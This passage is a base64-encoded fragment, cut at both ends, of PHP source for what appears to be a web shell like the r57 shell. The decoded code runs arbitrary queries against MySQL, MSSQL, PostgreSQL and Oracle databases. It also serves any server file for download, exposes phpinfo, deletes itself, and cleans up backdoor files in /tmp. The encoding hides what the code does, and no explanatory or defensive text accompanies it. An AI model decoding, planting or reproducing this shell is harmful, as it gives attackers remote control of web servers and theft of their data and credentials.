DAwIjskY2RyZWMuPSJceDAwXHgwMCI7JGNkcmVjLj0iXHgwOFx4MDAiOyRjZHJlYy49JGhleGR0aW1lOyRjZHJlYy49cGFjaygnVicsJGNyYyk7JGNkcmVjLj1wYWNrKCdWJywkY19sZW4pOyRjZHJlYy49cGFjaygnVicsJHVuY19sZW4pOyRjZHJlYy49cGFjaygndicsc3RybGVuKCRuYW1lKSk7JGNkcmVjLj1wYWNrKCd2JywwICk7JGNkcmVjLj1wYWNrKCd2JywwICk7JGNkcmVjLj1wYWNrKCd2JywwICk7JGNkcmVjLj1wYWNrKCd2JywwICk7JGNkcmVjLj1wYWNrKCdWJywzMiApOyRjZHJlYy49cGFjaygnVicsJHRoaXMtPm9sZF9vZmZzZXQpOyR0aGlzLT5vbGRfb2Zmc2V0Kz1zdHJsZW4oJGZyKTskY2RyZWMuPSRuYW1lOyR0aGlzLT5jdHJsX2RpcltdPSRjZHJlYzt9ZnVuY3Rpb24gZmlsZSgpeyRkYXRhPWltcGxvZGUoJycsJHRoaXMtPmRhdGFzZWMpOyRjdHJsZGlyPWltcGxvZGUoJycsJHRoaXMtPmN0cmxfZGlyKTtyZXR1cm4gJGRhdGEuJGN0cmxkaXIuJHRoaXMtPmVvZl9jdHJsX2Rpci5wYWNrKCd2JyxzaXplb2YoJHRoaXMtPmN0cmxfZGlyKSkucGFjaygndicsc2l6ZW9mKCR0aGlzLT5jdHJsX2RpcikpLnBhY2soJ1YnLHN0cmxlbigkY3RybGRpcikpLnBhY2soJ1YnLHN0cmxlbigkZGF0YSkpLiJceDAwXHgwMCI7fX1mdW5jdGlvbiBjb21wcmVzcygmJGZpbGVuYW1lLCYkZmlsZWR1bXAsJGNvbXByZXNzKXtnbG9iYWwgJGNvbnRlbnRfZW5jb2Rpbmc7Z2xvYmFsICRtaW1lX3R5cGU7aWYoJGNvbXByZXNzPT0nYnppcCcgJiYgQGZ1bmN0aW9uX2V4aXN0cygnYnpjb21wcmVzcycpKXskZmlsZW5hbWUuPScuYnoyJzskbWltZV90eXBlPSdhcHBsaWNhdGlvbi94LWJ6aXAyJzskZmlsZWR1bXA9Ynpjb21wcmVzcygkZmlsZWR1bXApO31lbHNlIGlmKCRjb21wcmVzcz09J2d6aXAnICYmIEBmdW5jdGlvbl9leGlzdHMoJ2d6ZW5jb2RlJykpeyRmaWxlbmFtZS49Jy5neic7JGNvbnRlbnRfZW5jb2Rpbmc9J3gtZ3ppcCc7JG1pbWVfdHlwZT0nYXBwbGljYXRpb24veC1nemlwJzskZmlsZWR1bXA9Z3plbmNvZGUoJGZpbGVkdW1wKTt9ZWxzZSBpZigkY29tcHJlc3M9PSd6aXAnICYmIEBmdW5jdGlvbl9leGlzdHMoJ2d6Y29tcHJlc3MnKSl7JGZpbGVuYW1lLj0nLnppcCc7JG1pbWVfdHlwZT0nYXBwbGljYXRpb24vemlwJzskemlwZmlsZT1uZXcgemlwZmlsZSgpOyR6aXBmaWxlLT5hZGRGaWxlKCRmaWxlZHVtcCxzdWJzdHIoJGZpbGVuYW1lLDAgLC00ICkpOyRmaWxlZHVtcD0kemlwZmlsZS0+ZmlsZSgpO31lbHNlIHskbWltZV90eXBlPSdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nO319ZnVuY3Rpb24gbWFpbGF0dGFjaCgkdG8sJGZyb20sJHN1YmosJGF0dGFjaCl7JGhlYWRlcnM9IkZyb206ICRmcm9tXHJcbiI7JGhlYWRlcnMuPSJNSU1FLVZlcnNpb246IDEuMFxyXG4iOyRoZWFkZXJzLj0iQ29udGVudC1UeXBlOiAiLiRhdHRhY2hbJ3R5cGUnXTskaGVhZGVycy49IjsgbmFtZT1cIiIuJGF0dGFjaFsnbmFtZSddLiJcIlxyXG4iOyRoZWFkZXJzLj0iQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogYmFzZTY0XHJcblxyXG4iOyRoZWFkZXJzLj1jaHVua19zcGxpdChiYXNlNjRfZW5jb2RlKCRhdHRhY2hbJ2NvbnRlbnQnXSkpLiJcclxuIjtpZihAbWFpbCgkdG8sJHN1YmosIiIsJGhlYWRlcnMpKXtyZXR1cm4gMSA7fXJldHVybiAwIDt9aWYoaXNzZXQoJF9HRVRbJ215c3FsX3F1ZXJ5J10pKXskbXlzcWxTZXJ2ZXI9KGlzc2V0KCRfUE9TVFsnbXlzcWxTZXJ2ZXInXSkpPyRfUE9TVFsnbXlzcWxTZXJ2ZXInXTonbG9jYWxob3N0JzskbXlzcWxVc2VyPShpc3NldCgkX1BPU1RbJ215c3FsVXNlciddKSk/JF9QT1NUWydteXNxbFVzZXInXToncm9vdCc7JG15c3FsUHdkPShpc3NldCgkX1BPU1RbJ215c3FsUHdkJ10pKT8kX1BPU1RbJ215c3FsUHdkJ106Jyc7JG15c3FsRGI9KGlzc2V0KCRfUE9TVFsnbXlzcWxEYiddKSk/JF9QT1NUWydteXNxbERiJ106Jyc7JG15c3FsUXVlcnk9KGlzc2V0KCRfUE9TVFsnbXlzcWxRdWVyeSddKSk/JF9QT1NUWydteXNxbFF1ZXJ5J106Jyc7cHJpbnQgJGhlYWQ7cHJpbnQgJzx0YWJsZSB3aWR0aD0xMDAlPjx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPXJlZD48Yj5NeXNxbCBxdWVyeTwvYj48L2ZvbnQ+PC9kaXY+PC90ZD48L3RyPjwvdGFibGU+JztwcmludCAnPGNlbnRlcj48dGFibGUgd2lkdGg9IjgwJSIgc3R5bGU9ImZvbnQtZmFtaWx5OlZlcmRhbmE7IGZvbnQtc2l6ZToxMHB4OyI+JztwcmludCAnPHRyPjx0ZCBhbGlnbj0iY2VudGVyIiBzdHlsZT0iZm9udC13ZWlnaHQ6Ym9sZDsiPic7cHJpbnQgJzxmb3JtIG1ldGhvZD0iUE9TVCI+JztwcmludCAnU2VydmVyOjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJteXNxbFNlcnZlciIgdmFsdWU9IicuJG15c3FsU2VydmVyLiciIC8+Jm5ic3A7Jm5ic3A7JztwcmludCAnVXNlcjo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ibXlzcWxVc2VyIiB2YWx1ZT0iJy4kbXlzcWxVc2VyLiciIC8+Jm5ic3A7Jm5ic3A7JztwcmludCAnUGFzc3dvcmQ6PGlucHV0IHR5cGU9InRleHQiIG5hbWU9Im15c3FsUHdkIiB2YWx1ZT0iJy4kbXlzcWxQd2QuJyIgLz4mbmJzcDsmbmJzcDsnO3ByaW50ICdEYXRhYmFzZTo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0ibXlzcWxEYiIgdmFsdWU9IicuJG15c3FsRGIuJyIgLz48YnIgLz4nO3ByaW50ICdRdWVyeTo8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iODAiIG5hbWU9Im15c3FsUXVlcnkiIHZhbHVlPSInLiRteXNxbFF1ZXJ5LiciIC8+Jm5ic3A7Jm5ic3A7JztwcmludCAnPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiIC8+JztwcmludCAnPC9mb3JtPic7cHJpbnQgJzwvdGQ+PC90cj4nO3ByaW50ICc8dHI+PHRkIGFsaWduPWNlbnRlcj48dGV4dGFyZWEgY29scz0xMjEgcm93cz0xNT4nO2lmKCRteXNxbFF1ZXJ5IT0nJyl7JGRiPW5ldyBkYm15c3FsKCRteXNxbFNlcnZlciwkbXlzcWxVc2VyLCRteXNxbFB3ZCwkbXlzcWxEYik7JHF1ZXJ5PSRkYi0+cXVlcnlBcnIoJG15c3FsUXVlcnkpO3ByaW50X3IoJHF1ZXJ5KTt9cHJpbnQgJzwvdGV4dGFyZWE+PC90ZD48L3RyPic7cHJpbnQgJzx0cj48dGQgc3R5bGU9ImZvbnQtc2l6ZTo5cHg7Ij48Yj48dT5FeGFtcGxlczo8L3U+PC9iPjxiciAvPic7cHJpbnQgIjxiPldvcmRQcmVzczo8L2I+IFNFTEVDVCBgb3B0aW9uX25hbWVgLGBvcHRpb25fdmFsdWVgIEZST00gYHdwX29wdGlvbnNgIFdIRVJFIGBvcHRpb25fbmFtZWAgPSAndGVtcGxhdGUnIE9SIGBvcHRpb25fbmFtZWAgPSAnc2l0ZXVybCciO3ByaW50ICc8L3RkPjwvdHI+JztwcmludCAnPC90YWJsZT48L2NlbnRlcj4nO3ByaW50ICI8YnI+PGRpdiBhbGlnbj1jZW50ZXI+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGI+WyA8YSBocmVmPSIuJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIj5CQUNLPC9hPiBdPC9iPjwvZm9udD48L2Rpdj4iO2RpZSgpO31pZihpc3NldCgkX0dFVFsnaW1nJ10pICYmICFlbXB0eSgkX0dFVFsnaW1nJ10pKXskaW1hZ2VzPWFycmF5KCk7JGltYWdlc1sxIF09J1IwbEdPRGxoQndBSEFJQUFBQUFBQVAvLy95SDVCQUVBQUFFQUxBQUFBQUFIQUFjQUFBSUxqSTlwa09EbllvaFVoUUlBT3c9PSc7JGltYWdlc1syIF09J1IwbEdPRGxoQndBSEFJQUFBQUFBQVAvLy95SDVCQUVBQUFFQUxBQUFBQUFIQUFjQUFBSUxqSStwd0EzaG5tbEpoZ0lBT3c9PSc7QG9iX2NsZWFuKCk7aGVhZGVyKCJDb250ZW50LXR5cGU6IGltYWdlL2dpZiIpO2VjaG8gYmFzZTY0X2RlY29kZSgkaW1hZ2VzWyRfR0VUWydpbWcnXV0pO2RpZSgpO31pZihpc3NldCgkX1BPU1RbJ2NtZCddKSAmJiAhZW1wdHkoJF9QT1NUWydjbWQnXSkgJiYgJF9QT1NUWydjbWQnXT09ImRvd25sb2FkX2ZpbGUiICYmICFlbXB0eSgkX1BPU1RbJ2RfbmFtZSddKSl7aWYoISRmaWxlPUBmb3BlbigkX1BPU1RbJ2RfbmFtZSddLCJyIikpe2VjaG8gcmUoJF9QT1NUWydkX25hbWUnXSk7JF9QT1NUWydjbWQnXT0iIjt9ZWxzZSB7QG9iX2NsZWFuKCk7JGZpbGVuYW1lPUBiYXNlbmFtZSgkX1BPU1RbJ2RfbmFtZSddKTskZmlsZWR1bXA9QGZyZWFkKCRmaWxlLEBmaWxlc2l6ZSgkX1BPU1RbJ2RfbmFtZSddKSk7ZmNsb3NlKCRmaWxlKTskY29udGVudF9lbmNvZGluZz0kbWltZV90eXBlPScnO2NvbXByZXNzKCRmaWxlbmFtZSwkZmlsZWR1bXAsJF9QT1NUWydjb21wcmVzcyddKTtpZighZW1wdHkoJGNvbnRlbnRfZW5jb2RpbmcpKXtoZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6ICcuJGNvbnRlbnRfZW5jb2RpbmcpO31oZWFkZXIoIkNvbnRlbnQtdHlwZTogIi4kbWltZV90eXBlKTtoZWFkZXIoIkNvbnRlbnQtZGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPVwiIi4kZmlsZW5hbWUuIlwiOyIpO2VjaG8gJGZpbGVkdW1wO2V4aXQoKTt9fWlmKGlzc2V0KCRfR0VUWydwaHBpbmZvJ10pKXtlY2hvIEBwaHBpbmZvKCk7ZWNobyAiPGJyPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPlsgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI+QkFDSzwvYT4gXTwvYj48L2ZvbnQ+PC9kaXY+IjtkaWUoKTt9aWYoJF9QT1NUWydjbWQnXT09ImRiX3F1ZXJ5Iil7ZWNobyAkaGVhZDtzd2l0Y2goJF9QT1NUWydkYiddKXtjYXNlICdNeVNRTCc6aWYoZW1wdHkoJF9QT1NUWydkYl9wb3J0J10pKXskX1BPU1RbJ2RiX3BvcnQnXT0nMzMwNic7fSRkYj1AbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0OicuJF9QT1NUWydkYl9wb3J0J10sJF9QT1NUWydteXNxbF9sJ10sJF9QT1NUWydteXNxbF9wJ10pO2lmKCRkYil7aWYoIWVtcHR5KCRfUE9TVFsnbXlzcWxfZGInXSkpe0BteXNxbF9zZWxlY3RfZGIoJF9QT1NUWydteXNxbF9kYiddLCRkYik7fSRxdWVyeXM9QGV4cGxvZGUoJzsnLCRfUE9TVFsnZGJfcXVlcnknXSk7Zm9yZWFjaCgkcXVlcnlzIGFzICRudW09PiRxdWVyeSl7aWYoc3RybGVuKCRxdWVyeSk+NSApe2VjaG8gIjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPWdyZWVuPjxiPlF1ZXJ5IyIuJG51bS4iIDogIi5odG1sc3BlY2lhbGNoYXJzKCRxdWVyeSkuIjwvYj48L2ZvbnQ+PGJyPiI7JHJlcz1AbXlzcWxfcXVlcnkoJHF1ZXJ5LCRkYik7JGVycm9yPUBteXNxbF9lcnJvcigkZGIpO2lmKCRlcnJvcil7ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCU+PHRyPjx0ZD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj5FcnJvciA6IDxiPiIuJGVycm9yLiI8L2I+PC9mb250PjwvdGQ+PC90cj48L3RhYmxlPjxicj4iO31lbHNlIHtpZihAbXlzcWxfbnVtX3Jvd3MoJHJlcyk+MCApeyRzcWwyPSRzcWw9JGtleXM9JHZhbHVlcz0nJzt3aGlsZSgoJHJvdz1AbXlzcWxfZmV0Y2hfYXNzb2MoJHJlcykpKXska2V5cz1AaW1wbG9kZSgiJm5ic3A7PC9iPjwvZm9udD48L3RkPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGI+Jm5ic3A7IixAYXJyYXlfa2V5cygkcm93KSk7JHZhbHVlcz1AYXJyYXlfdmFsdWVzKCRyb3cpO2ZvcmVhY2goJHZhbHVlcyBhcyAkaz0+JHYpeyR2YWx1ZXNbJGtdPWh0bWxzcGVjaWFsY2hhcnMoJHYpO30kdmFsdWVzPUBpbXBsb2RlKCImbmJzcDs8L2ZvbnQ+PC90ZD48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+Jm5ic3A7IiwkdmFsdWVzKTskc3FsMi49Ijx0cj48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+Jm5ic3A7Ii4kdmFsdWVzLiImbmJzcDs8L2ZvbnQ+PC90ZD48L3RyPiI7fWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlPiI7JHNxbD0iPHRyPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGI+Jm5ic3A7Ii4ka2V5cy4iJm5ic3A7PC9iPjwvZm9udD48L3RkPjwvdHI+Ijskc3FsLj0kc3FsMjtlY2hvICRzcWw7ZWNobyAiPC90YWJsZT48YnI+Ijt9ZWxzZSB7aWYoKCRyb3dzPUBteXNxbF9hZmZlY3RlZF9yb3dzKCRkYikpPj0wICl7ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCU+PHRyPjx0ZD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj5hZmZlY3RlZCByb3dzIDogPGI+Ii4kcm93cy4iPC9iPjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT48YnI+Ijt9fX1AbXlzcWxfZnJlZV9yZXN1bHQoJHJlcyk7fX1AbXlzcWxfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICI8ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+PGI+Q2FuJ3QgY29ubmVjdCB0byBNeVNRTCBzZXJ2ZXI8L2I+PC9mb250PjwvZGl2PiI7YnJlYWs7Y2FzZSAnTVNTUUwnOmlmKGVtcHR5KCRfUE9TVFsnZGJfcG9ydCddKSl7JF9QT1NUWydkYl9wb3J0J109JzE0MzMnO30kZGI9QG1zc3FsX2Nvbm5lY3QoJ2xvY2FsaG9zdCwnLiRfUE9TVFsnZGJfcG9ydCddLCRfUE9TVFsnbXlzcWxfbCddLCRfUE9TVFsnbXlzcWxfcCddKTtpZigkZGIpe2lmKCFlbXB0eSgkX1BPU1RbJ215c3FsX2RiJ10pKXtAbXNzcWxfc2VsZWN0X2RiKCRfUE9TVFsnbXlzcWxfZGInXSwkZGIpO30kcXVlcnlzPUBleHBsb2RlKCc7JywkX1BPU1RbJ2RiX3F1ZXJ5J10pO2ZvcmVhY2goJHF1ZXJ5cyBhcyAkbnVtPT4kcXVlcnkpe2lmKHN0cmxlbigkcXVlcnkpPjUgKXtlY2hvICI8Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1ncmVlbj48Yj5RdWVyeSMiLiRudW0uIiA6ICIuaHRtbHNwZWNpYWxjaGFycygkcXVlcnkpLiI8L2I+PC9mb250Pjxicj4iOyRyZXM9QG1zc3FsX3F1ZXJ5KCRxdWVyeSwkZGIpO2lmKEBtc3NxbF9udW1fcm93cygkcmVzKT4wICl7JHNxbDI9JHNxbD0ka2V5cz0kdmFsdWVzPScnO3doaWxlKCgkcm93PUBtc3NxbF9mZXRjaF9hc3NvYygkcmVzKSkpeyRrZXlzPUBpbXBsb2RlKCImbmJzcDs8L2I+PC9mb250PjwvdGQ+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4mbmJzcDsiLEBhcnJheV9rZXlzKCRyb3cpKTskdmFsdWVzPUBhcnJheV92YWx1ZXMoJHJvdyk7Zm9yZWFjaCgkdmFsdWVzIGFzICRrPT4kdil7JHZhbHVlc1ska109aHRtbHNwZWNpYWxjaGFycygkdik7fSR2YWx1ZXM9QGltcGxvZGUoIiZuYnNwOzwvZm9udD48L3RkPjx0ZD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj4mbmJzcDsiLCR2YWx1ZXMpOyRzcWwyLj0iPHRyPjx0ZD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj4mbmJzcDsiLiR2YWx1ZXMuIiZuYnNwOzwvZm9udD48L3RkPjwvdHI+Ijt9ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCU+Ijskc3FsPSI8dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4mbmJzcDsiLiRrZXlzLiImbmJzcDs8L2I+PC9mb250PjwvdGQ+PC90cj4iOyRzcWwuPSRzcWwyO2VjaG8gJHNxbDtlY2hvICI8L3RhYmxlPjxicj4iO31AbXNzcWxfZnJlZV9yZXN1bHQoJHJlcyk7fX1AbXNzcWxfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICI8ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+PGI+Q2FuJ3QgY29ubmVjdCB0byBNU1NRTCBzZXJ2ZXI8L2I+PC9mb250PjwvZGl2PiI7YnJlYWs7Y2FzZSAnUG9zdGdyZVNRTCc6aWYoZW1wdHkoJF9QT1NUWydkYl9wb3J0J10pKXskX1BPU1RbJ2RiX3BvcnQnXT0nNTQzMic7fSRzdHI9Imhvc3Q9J2xvY2FsaG9zdCcgcG9ydD0nIi4kX1BPU1RbJ2RiX3BvcnQnXS4iJyB1c2VyPSciLiRfUE9TVFsnbXlzcWxfbCddLiInIHBhc3N3b3JkPSciLiRfUE9TVFsnbXlzcWxfcCddLiInIGRibmFtZT0nIi4kX1BPU1RbJ215c3FsX2RiJ10uIiciOyRkYj1AcGdfY29ubmVjdCgkc3RyKTtpZigkZGIpeyRxdWVyeXM9QGV4cGxvZGUoJzsnLCRfUE9TVFsnZGJfcXVlcnknXSk7Zm9yZWFjaCgkcXVlcnlzIGFzICRudW09PiRxdWVyeSl7aWYoc3RybGVuKCRxdWVyeSk+NSApe2VjaG8gIjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPWdyZWVuPjxiPlF1ZXJ5IyIuJG51bS4iIDogIi5odG1sc3BlY2lhbGNoYXJzKCRxdWVyeSkuIjwvYj48L2ZvbnQ+PGJyPiI7JHJlcz1AcGdfcXVlcnkoJGRiLCRxdWVyeSk7JGVycm9yPUBwZ19lcnJvcm1lc3NhZ2UoJGRiKTtpZigkZXJyb3Ipe2VjaG8gIjx0YWJsZSB3aWR0aD0xMDAlPjx0cj48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+RXJyb3IgOiA8Yj4iLiRlcnJvci4iPC9iPjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT48YnI+Ijt9ZWxzZSB7aWYoQHBnX251bV9yb3dzKCRyZXMpPjAgKXskc3FsMj0kc3FsPSRrZXlzPSR2YWx1ZXM9Jyc7d2hpbGUoKCRyb3c9QHBnX2ZldGNoX2Fzc29jKCRyZXMpKSl7JGtleXM9QGltcGxvZGUoIiZuYnNwOzwvYj48L2ZvbnQ+PC90ZD48dGQgYmdjb2xvcj0jY2NjY2NjPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiZuYnNwOyIsQGFycmF5X2tleXMoJHJvdykpOyR2YWx1ZXM9QGFycmF5X3ZhbHVlcygkcm93KTtmb3JlYWNoKCR2YWx1ZXMgYXMgJGs9PiR2KXskdmFsdWVzWyRrXT1odG1sc3BlY2lhbGNoYXJzKCR2KTt9JHZhbHVlcz1AaW1wbG9kZSgiJm5ic3A7PC9mb250PjwvdGQ+PHRkPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiZuYnNwOyIsJHZhbHVlcyk7JHNxbDIuPSI8dHI+PHRkPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiZuYnNwOyIuJHZhbHVlcy4iJm5ic3A7PC9mb250PjwvdGQ+PC90cj4iO31lY2hvICI8dGFibGUgd2lkdGg9MTAwJT4iOyRzcWw9Ijx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiZuYnNwOyIuJGtleXMuIiZuYnNwOzwvYj48L2ZvbnQ+PC90ZD48L3RyPiI7JHNxbC49JHNxbDI7ZWNobyAkc3FsO2VjaG8gIjwvdGFibGU+PGJyPiI7fWVsc2Uge2lmKCgkcm93cz1AcGdfYWZmZWN0ZWRfcm93cygkcmVzKSk+PTAgKXtlY2hvICI8dGFibGUgd2lkdGg9MTAwJT48dHI+PHRkPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPmFmZmVjdGVkIHJvd3MgOiA8Yj4iLiRyb3dzLiI8L2I+PC9mb250PjwvdGQ+PC90cj48L3RhYmxlPjxicj4iO319fUBwZ19mcmVlX3Jlc3VsdCgkcmVzKTt9fUBwZ19jbG9zZSgkZGIpO31lbHNlIGVjaG8gIjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPXJlZD48Yj5DYW4ndCBjb25uZWN0IHRvIFBvc3RncmVTUUwgc2VydmVyPC9iPjwvZm9udD48L2Rpdj4iO2JyZWFrO2Nhc2UgJ09yYWNsZSc6JGRiPUBvY2lsb2dvbigkX1BPU1RbJ215c3FsX2wnXSwkX1BPU1RbJ215c3FsX3AnXSwkX1BPU1RbJ215c3FsX2RiJ10pO2lmKCgkZXJyb3I9QG9jaWVycm9yKCkpKXtlY2hvICI8ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+PGI+Q2FuJ3QgY29ubmVjdCB0byBPcmFjbGUgc2VydmVyLjxicj4iLiRlcnJvclsnbWVzc2FnZSddLiI8L2I+PC9mb250PjwvZGl2PiI7fWVsc2UgeyRxdWVyeXM9QGV4cGxvZGUoJzsnLCRfUE9TVFsnZGJfcXVlcnknXSk7Zm9yZWFjaCgkcXVlcnlzIGFzICRudW09PiRxdWVyeSl7aWYoc3RybGVuKCRxdWVyeSk+NSApe2VjaG8gIjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPWdyZWVuPjxiPlF1ZXJ5IyIuJG51bS4iIDogIi5odG1sc3BlY2lhbGNoYXJzKCRxdWVyeSkuIjwvYj48L2ZvbnQ+PGJyPiI7JHN0YXQ9QG9jaXBhcnNlKCRkYiwkcXVlcnkpO0BvY2lleGVjdXRlKCRzdGF0KTtpZigoJGVycm9yPUBvY2llcnJvcigpKSl7ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCU+PHRyPjx0ZD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj5FcnJvciA6IDxiPiIuJGVycm9yWydtZXNzYWdlJ10uIjwvYj48L2ZvbnQ+PC90ZD48L3RyPjwvdGFibGU+PGJyPiI7fWVsc2UgeyRyb3djb3VudD1Ab2Npcm93Y291bnQoJHN0YXQpO2lmKCRyb3djb3VudCE9MCApe2VjaG8gIjx0YWJsZSB3aWR0aD0xMDAlPjx0cj48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+YWZmZWN0ZWQgcm93cyA6IDxiPiIuJHJvd2NvdW50LiI8L2I+PC9mb250PjwvdGQ+PC90cj48L3RhYmxlPjxicj4iO31lbHNlIHtlY2hvICI8dGFibGUgd2lkdGg9MTAwJT48dHI+Ijtmb3IoJGo9MSA7JGo8PUBvY2ludW1jb2xzKCRzdGF0KTskaisrKXtlY2hvICI8dGQgYmdjb2xvcj0jY2NjY2NjPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiZuYnNwOyIuaHRtbHNwZWNpYWxjaGFycyhAb2NpY29sdW1ubmFtZSgkc3RhdCwkaikpLiImbmJzcDs8L2I+PC9mb250PjwvdGQ+Ijt9ZWNobyAiPC90cj4iO3doaWxlKG9jaWZldGNoKCRzdGF0KSl7ZWNobyAiPHRyPiI7Zm9yKCRqPTEgOyRqPD1Ab2NpbnVtY29scygkc3RhdCk7JGorKyl7ZWNobyAiPHRkPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiZuYnNwOyIuaHRtbHNwZWNpYWxjaGFycyhAb2NpcmVzdWx0KCRzdGF0LCRqKSkuIiZuYnNwOzwvZm9udD48L3RkPiI7fWVjaG8gIjwvdHI+Ijt9ZWNobyAiPC90YWJsZT48YnI+Ijt9QG9jaWZyZWVzdGF0ZW1lbnQoJHN0YXQpO319fUBvY2lsb2dvZmYoJGRiKTt9YnJlYWs7fWVjaG8gIjxmb3JtIG5hbWU9Zm9ybSBtZXRob2Q9UE9TVD4iO2VjaG8gaW4oJ2hpZGRlbicsJ2RiJywwICwkX1BPU1RbJ2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2RiX3BvcnQnLDAgLCRfUE9TVFsnZGJfcG9ydCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9sJywwICwkX1BPU1RbJ215c3FsX2wnXSk7ZWNobyBpbignaGlkZGVuJywnbXlzcWxfcCcsMCAsJF9QT1NUWydteXNxbF9wJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ215c3FsX2RiJywwICwkX1BPU1RbJ215c3FsX2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2NtZCcsMCAsJ2RiX3F1ZXJ5Jyk7ZWNobyAiPGRpdiBhbGlnbj1jZW50ZXI+PHRleHRhcmVhIGNvbHM9NjUgcm93cz0xMCBuYW1lPWRiX3F1ZXJ5PiIuKCFlbXB0eSgkX1BPU1RbJ2RiX3F1ZXJ5J10pPygkX1BPU1RbJ2RiX3F1ZXJ5J10pOigiU0hPVyBEQVRBQkFTRVM7XG5TRUxFQ1QgKiBGUk9NIHVzZXI7IikpLiI8L3RleHRhcmVhPjxicj48aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1zdWJtaXQgdmFsdWU9XCIgUnVuIFNRTCBxdWVyeSBcIj48L2Rpdj48YnI+PGJyPiI7ZWNobyAiPC9mb3JtPiI7ZWNobyAiPGJyPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPlsgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI+QkFDSzwvYT4gXTwvYj48L2ZvbnQ+PC9kaXY+IjtkaWUoKTt9aWYoaXNzZXQoJF9HRVRbJ2RlbGV0ZSddKSl7QHVubGluayhAc3Vic3RyKEBzdHJyY2hyKCRfU0VSVkVSWydQSFBfU0VMRiddLCIvIiksMSApKTt9aWYoaXNzZXQoJF9HRVRbJ3RtcCddKSl7QHVubGluaygiL3RtcC9iZHBsIik7QHVubGluaygiL3RtcC9iYWNrIik7QHVubGluaygiL3RtcC9iZCIpO0B1bmxpbmsoIi90bXAvYmQuYyIpO0B1bmxpbmsoIi90bXAvZHAiKTtAdW5saW5rKCIvdG1wL2RwYyIpO0B1bmxpbmsoIi90bXAvZHBjLmMiKTt9aWYoaXNzZXQoJF9HRVRbJ3BocGluaSddKSl7ZWNobyAkaGVhZDtmdW5jdGlvbiBVX3ZhbHVlKCR2YWx1ZSl7aWYoJHZhbHVlPT0nJylyZXR1cm4gJzxpPm5vIHZhbHVlPC9pPic7aWYoQGlzX2Jvb2woJHZhbHVlKSlyZXR1cm4gJHZhbHVlPydUUlVFJzonRkFMU0UnO2lmKCR2YWx1ZT09P